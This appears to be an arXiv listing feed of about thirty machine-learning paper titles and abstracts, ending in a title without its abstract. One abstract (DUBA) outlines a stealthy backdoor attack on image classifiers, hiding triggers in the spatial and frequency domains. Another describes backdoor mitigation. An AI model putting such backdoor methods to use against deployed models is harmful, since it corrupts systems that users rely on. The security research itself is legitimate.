    Differentiable Search Index is a recently proposed paradigm for document retrieval, that encodes information about a corpus of documents within the parameters of a neural network and directly maps queries to corresponding documents. These models have achieved state-of-the-art performances for document retrieval across many benchmarks. These kinds of models have a significant limitation: it is not easy to add new documents after a model is trained. We propose IncDSI, a method to add documents in real time (about 20-50ms per document), without retraining the model on the entire dataset (or even parts thereof). Instead we formulate the addition of documents as a constrained optimization problem that makes minimal changes to the network parameters. Although orders of magnitude faster, our approach is competitive with re-training the model on the whole dataset and enables the development of document retrieval systems that can be updated with new information in real-time. Our code for IncDSI is available at https://github.com/varshakishore/IncDSI.
    A Machine Learning based Empirical Evaluation of Cyber Threat Actors High Level Attack Patterns over Low level Attack Patterns in Attributing Attacks. (arXiv:2307.10252v1 [cs.CR])
    Cyber threat attribution is the process of identifying the actor of an attack incident in cyberspace. An accurate and timely threat attribution plays an important role in deterring future attacks by applying appropriate and timely defense mechanisms. Manual analysis of attack patterns gathered by honeypot deployments, intrusion detection systems, firewalls, and via trace-back procedures is still the preferred method of security analysts for cyber threat attribution. Such attack patterns are low-level Indicators of Compromise (IOC). They represent Tactics, Techniques, Procedures (TTP), and software tools used by the adversaries in their campaigns. The adversaries rarely re-use them. They can also be manipulated, resulting in false and unfair attribution. To empirically evaluate and compare the effectiveness of both kinds of IOC, there are two problems that need to be addressed. The first problem is that in recent research works, the ineffectiveness of low-level IOC for cyber threat attribution has been discussed intuitively. An empirical evaluation for the measure of the effectiveness of low-level IOC based on a real-world dataset is missing. The second problem is that the available dataset for high-level IOC has a single instance for each predictive class label that cannot be used directly for training machine learning models. To address these problems in this research work, we empirically evaluate the effectiveness of low-level IOC based on a real-world dataset that is specifically built for comparative analysis with high-level IOC. The experimental results show that the high-level IOC trained models effectively attribute cyberattacks with an accuracy of 95% as compared to the low-level IOC trained models where accuracy is 40%.
    Fairness in AI and Its Long-Term Implications on Society. (arXiv:2304.09826v2 [cs.CY] UPDATED)
    Successful deployment of artificial intelligence (AI) in various settings has led to numerous positive outcomes for individuals and society. However, AI systems have also been shown to harm parts of the population due to biased predictions. AI fairness focuses on mitigating such biases to ensure AI decision making is not discriminatory towards certain groups. We take a closer look at AI fairness and analyze how lack of AI fairness can lead to deepening of biases over time and act as a social stressor. More specifically, we discuss how biased models can lead to more negative real-world outcomes for certain groups, which may then become more prevalent by deploying new AI models trained on increasingly biased data, resulting in a feedback loop. If the issues persist, they could be reinforced by interactions with other risks and have severe implications on society in the form of social unrest. We examine current strategies for improving AI fairness, assess their limitations in terms of real-world deployment, and explore potential paths forward to ensure we reap AI's benefits without causing society's collapse.
    Detecting deceptive reviews using text classification. (arXiv:2307.10617v1 [cs.IR])
    In recent years, online reviews play a vital role for promoting any kind of product or services. Businesses may embed fake reviews in order to attract customers to purchase their products. They may even highlight the benefits of their own product or criticize the competition's product. Marketers, advertisers, and other online business users have incentive to create fake positive reviews for products which they want to promote or give fake negative reviews for products which they really don't like. So now-a-days writing a deceptive review is inevitable thing for promoting their own business or degrading competitor's reputation. Thus, identifying deceptive reviews is an intense and on-going research area. This research paper proposes machine learning model approach to identify deceptive reviews. The paper investigates the performance of the several experiments done on a Deceptive Opinion Spam Corpus dataset of restaurants reviews. We developed a n-gram model and max features to identify deceptive contents with a particular focus on fake reviews. Further, we conduct a benchmark study to investigate the performance of two different features extraction techniques and apply five machine learning classification techniques. The experimental results show that passive aggressive classifier outperforms other algorithms, and it reaches the highest accuracy not only in text classification but also to fake reviews. We also study the data augmentation and implement different deep learning techniques.
    Exploring Link Prediction over Hyper-Relational Temporal Knowledge Graphs Enhanced with Time-Invariant Relational Knowledge. (arXiv:2307.10219v1 [cs.AI])
    Stemming from traditional knowledge graphs (KGs), hyper-relational KGs (HKGs) provide additional key-value pairs (i.e., qualifiers) for each KG fact that help to better restrict the fact validity. In recent years, there has been an increasing interest in studying graph reasoning over HKGs. In the meantime, due to the ever-evolving nature of world knowledge, extensive parallel works have been focusing on reasoning over temporal KGs (TKGs), where each TKG fact can be viewed as a KG fact coupled with a timestamp (or time period) specifying its time validity. The existing HKG reasoning approaches do not consider temporal information because it is not explicitly specified in previous benchmark datasets. Besides, all the previous TKG reasoning methods only lay emphasis on temporal reasoning and have no way to learn from qualifiers. To this end, we aim to fill the gap between TKG reasoning and HKG reasoning. We develop two new benchmark hyper-relational TKG (HTKG) datasets, i.e., Wiki-hy and YAGO-hy, and propose a HTKG reasoning model that efficiently models both temporal facts and qualifiers. We further exploit additional time-invariant relational knowledge from the Wikidata knowledge base and study its effectiveness in HTKG reasoning. Time-invariant relational knowledge serves as the knowledge that remains unchanged in time (e.g., Sasha Obama is the child of Barack Obama), and it has never been fully explored in previous TKG reasoning benchmarks and approaches. Experimental results show that our model substantially outperforms previous related methods on HTKG link prediction and can be enhanced by jointly leveraging both temporal and time-invariant relational knowledge.
    Mathematical Capabilities of ChatGPT. (arXiv:2301.13867v2 [cs.LG] UPDATED)
    We investigate the mathematical capabilities of two iterations of ChatGPT (released 9-January-2023 and 30-January-2023) and of GPT-4 by testing them on publicly available datasets, as well as hand-crafted ones, using a novel methodology. In contrast to formal mathematics, where large databases of formal proofs are available (e.g., the Lean Mathematical Library), current datasets of natural-language mathematics, used to benchmark language models, either cover only elementary mathematics or are very small. We address this by publicly releasing two new datasets: GHOSTS and miniGHOSTS. These are the first natural-language datasets curated by working researchers in mathematics that (1) aim to cover graduate-level mathematics, (2) provide a holistic overview of the mathematical capabilities of language models, and (3) distinguish multiple dimensions of mathematical reasoning. These datasets also test whether ChatGPT and GPT-4 can be helpful assistants to professional mathematicians by emulating use cases that arise in the daily professional activities of mathematicians. We benchmark the models on a range of fine-grained performance metrics. For advanced mathematics, this is the most detailed evaluation effort to date. We find that ChatGPT can be used most successfully as a mathematical assistant for querying facts, acting as a mathematical search engine and knowledge base interface. GPT-4 can additionally be used for undergraduate-level mathematics but fails on graduate-level difficulty. Contrary to many positive reports in the media about GPT-4 and ChatGPT's exam-solving abilities (a potential case of selection bias), their overall mathematical performance is well below the level of a graduate student. Hence, if your goal is to use ChatGPT to pass a graduate-level math exam, you would be better off copying from your average peer!
    Self-paced Weight Consolidation for Continual Learning. (arXiv:2307.10845v1 [cs.LG])
    Continual learning algorithms which keep the parameters of new tasks close to that of previous tasks, are popular in preventing catastrophic forgetting in sequential task learning settings. However, 1) the performance for the new continual learner will be degraded without distinguishing the contributions of previously learned tasks; 2) the computational cost will be greatly increased with the number of tasks, since most existing algorithms need to regularize all previous tasks when learning new tasks. To address the above challenges, we propose a self-paced Weight Consolidation (spWC) framework to attain robust continual learning via evaluating the discriminative contributions of previous tasks. To be specific, we develop a self-paced regularization to reflect the priorities of past tasks via measuring difficulty based on key performance indicator (i.e., accuracy). When encountering a new task, all previous tasks are sorted from "difficult" to "easy" based on the priorities. Then the parameters of the new continual learner will be learned via selectively maintaining the knowledge amongst more difficult past tasks, which could well overcome catastrophic forgetting with less computational cost. We adopt an alternative convex search to iteratively update the model parameters and priority weights in the bi-convex formulation. The proposed spWC framework is plug-and-play, which is applicable to most continual learning algorithms (e.g., EWC, MAS and RCIL) in different directions (e.g., classification and segmentation). Experimental results on several public benchmark datasets demonstrate that our proposed framework can effectively improve performance when compared with other popular continual learning algorithms.
    SC VALL-E: Style-Controllable Zero-Shot Text to Speech Synthesizer. (arXiv:2307.10550v1 [cs.SD])
    Expressive speech synthesis models are trained by adding corpora with diverse speakers, various emotions, and different speaking styles to the dataset, in order to control various characteristics of speech and generate the desired voice. In this paper, we propose a style control (SC) VALL-E model based on the neural codec language model (called VALL-E), which follows the structure of the generative pretrained transformer 3 (GPT-3). The proposed SC VALL-E takes input from text sentences and prompt audio and is designed to generate controllable speech by not simply mimicking the characteristics of the prompt audio but by controlling the attributes to produce diverse voices. We identify tokens in the style embedding matrix of the newly designed style network that represent attributes such as emotion, speaking rate, pitch, and voice intensity, and design a model that can control these attributes. To evaluate the performance of SC VALL-E, we conduct comparative experiments with three representative expressive speech synthesis models: global style token (GST) Tacotron2, variational autoencoder (VAE) Tacotron2, and original VALL-E. We measure word error rate (WER), F0 voiced error (FVE), and F0 gross pitch error (F0GPE) as evaluation metrics to assess the accuracy of generated sentences. For comparing the quality of synthesized speech, we measure comparative mean option score (CMOS) and similarity mean option score (SMOS). To evaluate the style control ability of the generated speech, we observe the changes in F0 and mel-spectrogram by modifying the trained tokens. When using prompt audio that is not present in the training data, SC VALL-E generates a variety of expressive sounds and demonstrates competitive performance compared to the existing models. Our implementation, pretrained models, and audio samples are located on GitHub.
    Forecasting Battery Electric Vehicle Charging Behavior: A Deep Learning Approach Equipped with Micro-Clustering and SMOTE Techniques. (arXiv:2307.10588v1 [cs.LG])
    Energy systems, climate change, and public health are among the primary reasons for moving toward electrification in transportation. Transportation electrification is being promoted worldwide to reduce emissions. As a result, many automakers will soon start making only battery electric vehicles (BEVs). BEV adoption rates are rising in California, mainly due to climate change and air pollution concerns. While great for climate and pollution goals, improperly managed BEV charging can lead to insufficient charging infrastructure and power outages. This study develops a novel Micro Clustering Deep Neural Network (MCDNN), an artificial neural network algorithm that is highly effective at learning BEVs trip and charging data to forecast BEV charging events, information that is essential for electricity load aggregators and utility managers to provide charging stations and electricity capacity effectively. The MCDNN is configured using a robust dataset of trips and charges that occurred in California between 2015 and 2020 from 132 BEVs, spanning 5 BEV models for a total of 1570167 vehicle miles traveled. The numerical findings revealed that the proposed MCDNN is more effective than benchmark approaches in this field, such as support vector machine, k nearest neighbors, decision tree, and other neural network-based models in predicting the charging events.
    Fairness-Aware Client Selection for Federated Learning. (arXiv:2307.10738v1 [cs.LG])
    Federated learning (FL) has enabled multiple data owners (a.k.a. FL clients) to train machine learning models collaboratively without revealing private data. Since the FL server can only engage a limited number of clients in each training round, FL client selection has become an important research problem. Existing approaches generally focus on either enhancing FL model performance or enhancing the fair treatment of FL clients. The problem of balancing performance and fairness considerations when selecting FL clients remains open. To address this problem, we propose the Fairness-aware Federated Client Selection (FairFedCS) approach. Based on Lyapunov optimization, it dynamically adjusts FL clients' selection probabilities by jointly considering their reputations, times of participation in FL tasks and contributions to the resulting model performance. By not using threshold-based reputation filtering, it provides FL clients with opportunities to redeem their reputations after a perceived poor performance, thereby further enhancing fair client treatment. Extensive experiments based on real-world multimedia datasets show that FairFedCS achieves 19.6% higher fairness and 0.73% higher test accuracy on average than the best-performing state-of-the-art approach.
    Music Genre Classification with ResNet and Bi-GRU Using Visual Spectrograms. (arXiv:2307.10773v1 [cs.SD])
    Music recommendation systems have emerged as a vital component to enhance user experience and satisfaction for the music streaming services, which dominates music consumption. The key challenge in improving these recommender systems lies in comprehending the complexity of music data, specifically for the underpinning music genre classification. The limitations of manual genre classification have highlighted the need for a more advanced system, namely the Automatic Music Genre Classification (AMGC) system. While traditional machine learning techniques have shown potential in genre classification, they heavily rely on manually engineered features and feature selection, failing to capture the full complexity of music data. On the other hand, deep learning classification architectures like the traditional Convolutional Neural Networks (CNN) are effective in capturing the spatial hierarchies but struggle to capture the temporal dynamics inherent in music data. To address these challenges, this study proposes a novel approach using visual spectrograms as input, and propose a hybrid model that combines the strength of the Residual neural Network (ResNet) and the Gated Recurrent Unit (GRU). This model is designed to provide a more comprehensive analysis of music data, offering the potential to improve the music recommender systems through achieving a more comprehensive analysis of music data and hence potentially more accurate genre classification.
    Multi-Method Self-Training: Improving Code Generation With Text, And Vice Versa. (arXiv:2307.10633v1 [cs.CL])
    Large Language Models have many methods for solving the same problem. This introduces novel strengths (different methods may work well for different problems) and weaknesses (it may be difficult for users to know which method to use). In this paper, we introduce Multi-Method Self-Training (MMST), where one method is trained on the filtered outputs of another, allowing us to augment the strengths and ameliorate the weaknesses of each method. Using a 176B parameter model trained on both language and code, we show that MMST can 1) improve the less performant method (up to 30%) making the model easier to use, 2) improve the more performant method (up to 32.2%) making the model more performant, and 3) improve the performance of related but distinct tasks (up to 10.3%) by improving the ability of the model to generate rationales. We then conduct ablation analyses to explore why MMST works. We show that MMST generates more data than traditional self-training, but the improvement in performance is driven by the use of multiple methods. We also analyze prompt-engineering and anti-correlated performance between methods as means of making MMST more effective. We hope the evidence from our paper motivates machine learning researchers to explore ways in which advances in language models allow for new forms of training.
    SecureBoost Hyperparameter Tuning via Multi-Objective Federated Learning. (arXiv:2307.10579v1 [cs.LG])
    SecureBoost is a tree-boosting algorithm leveraging homomorphic encryption to protect data privacy in vertical federated learning setting. It is widely used in fields such as finance and healthcare due to its interpretability, effectiveness, and privacy-preserving capability. However, SecureBoost suffers from high computational complexity and risk of label leakage. To harness the full potential of SecureBoost, hyperparameters of SecureBoost should be carefully chosen to strike an optimal balance between utility, efficiency, and privacy. Existing methods either set hyperparameters empirically or heuristically, which are far from optimal. To fill this gap, we propose a Constrained Multi-Objective SecureBoost (CMOSB) algorithm to find Pareto optimal solutions that each solution is a set of hyperparameters achieving optimal tradeoff between utility loss, training cost, and privacy leakage. We design measurements of the three objectives. In particular, the privacy leakage is measured using our proposed instance clustering attack. Experimental results demonstrate that the CMOSB yields not only hyperparameters superior to the baseline but also optimal sets of hyperparameters that can support the flexible requirements of FL participants.
    Meta-Transformer: A Unified Framework for Multimodal Learning. (arXiv:2307.10802v1 [cs.CV])
    Multimodal learning aims to build models that can process and relate information from multiple modalities. Despite years of development in this field, it still remains challenging to design a unified network for processing various modalities ($\textit{e.g.}$ natural language, 2D images, 3D point clouds, audio, video, time series, tabular data) due to the inherent gaps among them. In this work, we propose a framework, named Meta-Transformer, that leverages a $\textbf{frozen}$ encoder to perform multimodal perception without any paired multimodal training data. In Meta-Transformer, the raw input data from various modalities are mapped into a shared token space, allowing a subsequent encoder with frozen parameters to extract high-level semantic features of the input data. Composed of three main components: a unified data tokenizer, a modality-shared encoder, and task-specific heads for downstream tasks, Meta-Transformer is the first framework to perform unified learning across 12 modalities with unpaired data. Experiments on different benchmarks reveal that Meta-Transformer can handle a wide range of tasks including fundamental perception (text, image, point cloud, audio, video), practical application (X-Ray, infrared, hyperspectral, and IMU), and data mining (graph, tabular, and time-series). Meta-Transformer indicates a promising future for developing unified multimodal intelligence with transformers. Code will be available at https://github.com/invictus717/MetaTransformer
    Ensemble Learning based Anomaly Detection for IoT Cybersecurity via Bayesian Hyperparameters Sensitivity Analysis. (arXiv:2307.10596v1 [cs.LG])
    The Internet of Things (IoT) integrates more than billions of intelligent devices over the globe with the capability of communicating with other connected devices with little to no human intervention. IoT enables data aggregation and analysis on a large scale to improve life quality in many domains. In particular, data collected by IoT contain a tremendous amount of information for anomaly detection. The heterogeneous nature of IoT is both a challenge and an opportunity for cybersecurity. Traditional approaches in cybersecurity monitoring often require different kinds of data pre-processing and handling for various data types, which might be problematic for datasets that contain heterogeneous features. However, heterogeneous types of network devices can often capture a more diverse set of signals than a single type of device readings, which is particularly useful for anomaly detection. In this paper, we present a comprehensive study on using ensemble machine learning methods for enhancing IoT cybersecurity via anomaly detection. Rather than using one single machine learning model, ensemble learning combines the predictive power from multiple models, enhancing their predictive accuracy in heterogeneous datasets rather than using one single machine learning model. We propose a unified framework with ensemble learning that utilises Bayesian hyperparameter optimisation to adapt to a network environment that contains multiple IoT sensor readings. Experimentally, we illustrate their high predictive power when compared to traditional methods.
    Feed-Forward Source-Free Domain Adaptation via Class Prototypes. (arXiv:2307.10787v1 [cs.CV])
    Source-free domain adaptation has become popular because of its practical usefulness and no need to access source data. However, the adaptation process still takes a considerable amount of time and is predominantly based on optimization that relies on back-propagation. In this work we present a simple feed-forward approach that challenges the need for back-propagation based adaptation. Our approach is based on computing prototypes of classes under the domain shift using a pre-trained model. It achieves strong improvements in accuracy compared to the pre-trained model and requires only a small fraction of time of existing domain adaptation methods.
    FedBug: A Bottom-Up Gradual Unfreezing Framework for Federated Learning. (arXiv:2307.10317v1 [cs.LG])
    Federated Learning (FL) offers a collaborative training framework, allowing multiple clients to contribute to a shared model without compromising data privacy. Due to the heterogeneous nature of local datasets, updated client models may overfit and diverge from one another, commonly known as the problem of client drift. In this paper, we propose FedBug (Federated Learning with Bottom-Up Gradual Unfreezing), a novel FL framework designed to effectively mitigate client drift. FedBug adaptively leverages the client model parameters, distributed by the server at each global round, as the reference points for cross-client alignment. Specifically, on the client side, FedBug begins by freezing the entire model, then gradually unfreezes the layers, from the input layer to the output layer. This bottom-up approach allows models to train the newly thawed layers to project data into a latent space, wherein the separating hyperplanes remain consistent across all clients. We theoretically analyze FedBug in a novel over-parameterization FL setup, revealing its superior convergence rate compared to FedAvg. Through comprehensive experiments, spanning various datasets, training conditions, and network architectures, we validate the efficacy of FedBug. Our contributions encompass a novel FL framework, theoretical analysis, and empirical validation, demonstrating the wide potential and applicability of FedBug.
    MSQNet: Actor-agnostic Action Recognition with Multi-modal Query. (arXiv:2307.10763v1 [cs.CV])
    Existing action recognition methods are typically actor-specific due to the intrinsic topological and apparent differences among the actors. This requires actor-specific pose estimation (e.g., humans vs. animals), leading to cumbersome model design complexity and high maintenance costs. Moreover, they often focus on learning the visual modality alone and single-label classification whilst neglecting other available information sources (e.g., class name text) and the concurrent occurrence of multiple actions. To overcome these limitations, we propose a new approach called 'actor-agnostic multi-modal multi-label action recognition,' which offers a unified solution for various types of actors, including humans and animals. We further formulate a novel Multi-modal Semantic Query Network (MSQNet) model in a transformer-based object detection framework (e.g., DETR), characterized by leveraging visual and textual modalities to represent the action classes better. The elimination of actor-specific model designs is a key advantage, as it removes the need for actor pose estimation altogether. Extensive experiments on five publicly available benchmarks show that our MSQNet consistently outperforms the prior arts of actor-specific alternatives on human and animal single- and multi-label action recognition tasks by up to 50%. Code will be released at https://github.com/mondalanindya/MSQNet.
    A Dual Stealthy Backdoor: From Both Spatial and Frequency Perspectives. (arXiv:2307.10184v1 [cs.CR])
    Backdoor attacks pose serious security threats to deep neural networks (DNNs). Backdoored models make arbitrarily (targeted) incorrect predictions on inputs embedded with well-designed triggers while behaving normally on clean inputs. Many works have explored the invisibility of backdoor triggers to improve attack stealthiness. However, most of them only consider the invisibility in the spatial domain without explicitly accounting for the generation of invisible triggers in the frequency domain, making the generated poisoned images be easily detected by recent defense methods. To address this issue, in this paper, we propose a DUal stealthy BAckdoor attack method named DUBA, which simultaneously considers the invisibility of triggers in both the spatial and frequency domains, to achieve desirable attack performance, while ensuring strong stealthiness. Specifically, we first use Discrete Wavelet Transform to embed the high-frequency information of the trigger image into the clean image to ensure attack effectiveness. Then, to attain strong stealthiness, we incorporate Fourier Transform and Discrete Cosine Transform to mix the poisoned image and clean image in the frequency domain. Moreover, the proposed DUBA adopts a novel attack strategy, in which the model is trained with weak triggers and attacked with strong triggers to further enhance the attack performance and stealthiness. We extensively evaluate DUBA against popular image classifiers on four datasets. The results demonstrate that it significantly outperforms the state-of-the-art backdoor attacks in terms of the attack success rate and stealthiness
    Divide & Bind Your Attention for Improved Generative Semantic Nursing. (arXiv:2307.10864v1 [cs.CV])
    Emerging large-scale text-to-image generative models, e.g., Stable Diffusion (SD), have exhibited overwhelming results with high fidelity. Despite the magnificent progress, current state-of-the-art models still struggle to generate images fully adhering to the input prompt. Prior work, Attend & Excite, has introduced the concept of Generative Semantic Nursing (GSN), aiming to optimize cross-attention during inference time to better incorporate the semantics. It demonstrates promising results in generating simple prompts, e.g., ``a cat and a dog''. However, its efficacy declines when dealing with more complex prompts, and it does not explicitly address the problem of improper attribute binding. To address the challenges posed by complex prompts or scenarios involving multiple entities and to achieve improved attribute binding, we propose Divide & Bind. We introduce two novel loss objectives for GSN: a novel attendance loss and a binding loss. Our approach stands out in its ability to faithfully synthesize desired objects with improved attribute alignment from complex prompts and exhibits superior performance across multiple evaluation benchmarks. More videos and updates can be found on the project page \url{https://sites.google.com/view/divide-and-bind}.
    Identifying Interpretable Subspaces in Image Representations. (arXiv:2307.10504v1 [cs.CV])
    We propose Automatic Feature Explanation using Contrasting Concepts (FALCON), an interpretability framework to explain features of image representations. For a target feature, FALCON captions its highly activating cropped images using a large captioning dataset (like LAION-400m) and a pre-trained vision-language model like CLIP. Each word among the captions is scored and ranked leading to a small number of shared, human-understandable concepts that closely describe the target feature. FALCON also applies contrastive interpretation using lowly activating (counterfactual) images, to eliminate spurious concepts. Although many existing approaches interpret features independently, we observe in state-of-the-art self-supervised and supervised models, that less than 20% of the representation space can be explained by individual features. We show that features in larger spaces become more interpretable when studied in groups and can be explained with high-order scoring concepts through FALCON. We discuss how extracted concepts can be used to explain and debug failures in downstream tasks. Finally, we present a technique to transfer concepts from one (explainable) representation space to another unseen representation space by learning a simple linear transformation.
    A Matrix Ensemble Kalman Filter-based Multi-arm Neural Network to Adequately Approximate Deep Neural Networks. (arXiv:2307.10436v1 [stat.ML])
    Deep Learners (DLs) are the state-of-art predictive mechanism with applications in many fields requiring complex high dimensional data processing. Although conventional DLs get trained via gradient descent with back-propagation, Kalman Filter (KF)-based techniques that do not need gradient computation have been developed to approximate DLs. We propose a multi-arm extension of a KF-based DL approximator that can mimic DL when the sample size is too small to train a multi-arm DL. The proposed Matrix Ensemble Kalman Filter-based multi-arm ANN (MEnKF-ANN) also performs explicit model stacking that becomes relevant when the training sample has an unequal-size feature set. Our proposed technique can approximate Long Short-term Memory (LSTM) Networks and attach uncertainty to the predictions obtained from these LSTMs with desirable coverage. We demonstrate how MEnKF-ANN can "adequately" approximate an LSTM network trained to classify what carbohydrate substrates are digested and utilized by a microbiome sample whose genomic sequences consist of polysaccharide utilization loci (PULs) and their encoded genes.
    Shared Adversarial Unlearning: Backdoor Mitigation by Unlearning Shared Adversarial Examples. (arXiv:2307.10562v1 [cs.LG])
    Backdoor attacks are serious security threats to machine learning models where an adversary can inject poisoned samples into the training set, causing a backdoored model which predicts poisoned samples with particular triggers to particular target classes, while behaving normally on benign samples. In this paper, we explore the task of purifying a backdoored model using a small clean dataset. By establishing the connection between backdoor risk and adversarial risk, we derive a novel upper bound for backdoor risk, which mainly captures the risk on the shared adversarial examples (SAEs) between the backdoored model and the purified model. This upper bound further suggests a novel bi-level optimization problem for mitigating backdoor using adversarial training techniques. To solve it, we propose Shared Adversarial Unlearning (SAU). Specifically, SAU first generates SAEs, and then, unlearns the generated SAEs such that they are either correctly classified by the purified model and/or differently classified by the two models, such that the backdoor effect in the backdoored model will be mitigated in the purified model. Experiments on various benchmark datasets and network architectures show that our proposed method achieves state-of-the-art performance for backdoor defense.
    Mood Classification of Bangla Songs Based on Lyrics. (arXiv:2307.10314v1 [cs.IR])
    Music can evoke various emotions, and with the advancement of technology, it has become more accessible to people. Bangla music, which portrays different human emotions, lacks sufficient research. The authors of this article aim to analyze Bangla songs and classify their moods based on the lyrics. To achieve this, this research has compiled a dataset of 4000 Bangla song lyrics, genres, and used Natural Language Processing and the Bert Algorithm to analyze the data. Among the 4000 songs, 1513 songs are represented for the sad mood, 1362 for the romantic mood, 886 for happiness, and the rest 239 are classified as relaxation. By embedding the lyrics of the songs, the authors have classified the songs into four moods: Happy, Sad, Romantic, and Relaxed. This research is crucial as it enables a multi-class classification of songs' moods, making the music more relatable to people's emotions. The article presents the automated result of the four moods accurately derived from the song lyrics.
    Beyond Black-Box Advice: Learning-Augmented Algorithms for MDPs with Q-Value Predictions. (arXiv:2307.10524v1 [cs.LG])
    We study the tradeoff between consistency and robustness in the context of a single-trajectory time-varying Markov Decision Process (MDP) with untrusted machine-learned advice. Our work departs from the typical approach of treating advice as coming from black-box sources by instead considering a setting where additional information about how the advice is generated is available. We prove a first-of-its-kind consistency and robustness tradeoff given Q-value advice under a general MDP model that includes both continuous and discrete state/action spaces. Our results highlight that utilizing Q-value advice enables dynamic pursuit of the better of machine-learned advice and a robust baseline, thus result in near-optimal performance guarantees, which provably improves what can be obtained solely with black-box advice.
    Classification of Visualization Types and Perspectives in Patents. (arXiv:2307.10471v1 [cs.CV])
    Due to the swift growth of patent applications each year, information and multimedia retrieval approaches that facilitate patent exploration and retrieval are of utmost importance. Different types of visualizations (e.g., graphs, technical drawings) and perspectives (e.g., side view, perspective) are used to visualize details of innovations in patents. The classification of these images enables a more efficient search and allows for further analysis. So far, datasets for image type classification miss some important visualization types for patents. Furthermore, related work does not make use of recent deep learning approaches including transformers. In this paper, we adopt state-of-the-art deep learning methods for the classification of visualization types and perspectives in patent images. We extend the CLEF-IP dataset for image type classification in patents to ten classes and provide manual ground truth annotations. In addition, we derive a set of hierarchical classes from a dataset that provides weakly-labeled data for image perspectives. Experimental results have demonstrated the feasibility of the proposed approaches. Source code, models, and dataset will be made publicly available.
    Deep Neural Networks and Brain Alignment: Brain Encoding and Decoding (Survey). (arXiv:2307.10246v1 [q-bio.NC])
    How does the brain represent different modes of information? Can we design a system that automatically understands what the user is thinking? Such questions can be answered by studying brain recordings like functional magnetic resonance imaging (fMRI). As a first step, the neuroscience community has contributed several large cognitive neuroscience datasets related to passive reading/listening/viewing of concept words, narratives, pictures and movies. Encoding and decoding models using these datasets have also been proposed in the past two decades. These models serve as additional tools for basic research in cognitive science and neuroscience. Encoding models aim at generating fMRI brain representations given a stimulus automatically. They have several practical applications in evaluating and diagnosing neurological conditions and thus also help design therapies for brain damage. Decoding models solve the inverse problem of reconstructing the stimuli given the fMRI. They are useful for designing brain-machine or brain-computer interfaces. Inspired by the effectiveness of deep learning models for natural language processing, computer vision, and speech, recently several neural encoding and decoding models have been proposed. In this survey, we will first discuss popular representations of language, vision and speech stimuli, and present a summary of neuroscience datasets. Further, we will review popular deep learning based encoding and decoding architectures and note their benefits and limitations. Finally, we will conclude with a brief summary and discussion about future trends. Given the large amount of recently published work in the `computational cognitive neuroscience' community, we believe that this survey nicely organizes the plethora of work and presents it as a coherent story.
    Long-Tail Theory under Gaussian Mixtures. (arXiv:2307.10736v1 [cs.LG])
    We suggest a simple Gaussian mixture model for data generation that complies with Feldman's long tail theory (2020). We demonstrate that a linear classifier cannot decrease the generalization error below a certain level in the proposed model, whereas a nonlinear classifier with a memorization capacity can. This confirms that for long-tailed distributions, rare training examples must be considered for optimal generalization to new data. Finally, we show that the performance gap between linear and nonlinear models can be lessened as the tail becomes shorter in the subpopulation frequency distribution, as confirmed by experiments on synthetic and real data.
    Global Precipitation Nowcasting of Integrated Multi-satellitE Retrievals for GPM: A U-Net Convolutional LSTM Architecture. (arXiv:2307.10843v1 [cs.LG])
    This paper presents a deep learning architecture for nowcasting of precipitation almost globally every 30 min with a 4-hour lead time. The architecture fuses a U-Net and a convolutional long short-term memory (LSTM) neural network and is trained using data from the Integrated MultisatellitE Retrievals for GPM (IMERG) and a few key precipitation drivers from the Global Forecast System (GFS). The impacts of different training loss functions, including the mean-squared error (regression) and the focal-loss (classification), on the quality of precipitation nowcasts are studied. The results indicate that the regression network performs well in capturing light precipitation (below 1.6 mm/hr), but the classification network can outperform the regression network for nowcasting of precipitation extremes (>8 mm/hr), in terms of the critical success index (CSI).. Using the Wasserstein distance, it is shown that the predicted precipitation by the classification network has a closer class probability distribution to the IMERG than the regression network. It is uncovered that the inclusion of the physical variables can improve precipitation nowcasting, especially at longer lead times in both networks. Taking IMERG as a relative reference, a multi-scale analysis in terms of fractions skill score (FSS), shows that the nowcasting machine remains skillful (FSS > 0.5) at the resolution of 10 km compared to 50 km for GFS. For precipitation rates greater than 4~mm/hr, only the classification network remains FSS-skillful on scales greater than 50 km within a 2-hour lead time.
    Player-optimal Stable Regret for Bandit Learning in Matching Markets. (arXiv:2307.10890v1 [cs.LG])
    The problem of matching markets has been studied for a long time in the literature due to its wide range of applications. Finding a stable matching is a common equilibrium objective in this problem. Since market participants are usually uncertain of their preferences, a rich line of recent works study the online setting where one-side participants (players) learn their unknown preferences from iterative interactions with the other side (arms). Most previous works in this line are only able to derive theoretical guarantees for player-pessimal stable regret, which is defined compared with the players' least-preferred stable matching. However, under the pessimal stable matching, players only obtain the least reward among all stable matchings. To maximize players' profits, player-optimal stable matching would be the most desirable. Though \citet{basu21beyond} successfully bring an upper bound for player-optimal stable regret, their result can be exponentially large if players' preference gap is small. Whether a polynomial guarantee for this regret exists is a significant but still open problem. In this work, we provide a new algorithm named explore-then-Gale-Shapley (ETGS) and show that the optimal stable regret of each player can be upper bounded by $O(K\log T/\Delta^2)$ where $K$ is the number of arms, $T$ is the horizon and $\Delta$ is the players' minimum preference gap among the first $N+1$-ranked arms. This result significantly improves previous works which either have a weaker player-pessimal stable matching objective or apply only to markets with special assumptions. When the preferences of participants satisfy some special conditions, our regret upper bound also matches the previously derived lower bound.
    Neural Network Complexity of Chaos and Turbulence. (arXiv:2211.15382v2 [cs.LG] UPDATED)
    Chaos and turbulence are complex physical phenomena, yet a precise definition of the complexity measure that quantifies them is still lacking. In this work we consider the relative complexity of chaos and turbulence from the perspective of deep neural networks. We analyze a set of classification problems, where the network has to distinguish images of fluid profiles in the turbulent regime from other classes of images such as fluid profiles in the chaotic regime, various constructions of noise and real world images. We analyze incompressible as well as weakly compressible fluid flows. We quantify the complexity of the computation performed by the network via the intrinsic dimensionality of the internal feature representations, and calculate the effective number of independent features which the network uses in order to distinguish between classes. In addition to providing a numerical estimate of the complexity of the computation, the measure also characterizes the neural network processing at intermediate and final stages. We construct adversarial examples and use them to identify the two point correlation spectra for the chaotic and turbulent vorticity as the feature used by the network for classification.
    Decoding the Enigma: Benchmarking Humans and AIs on the Many Facets of Working Memory. (arXiv:2307.10768v1 [q-bio.NC])
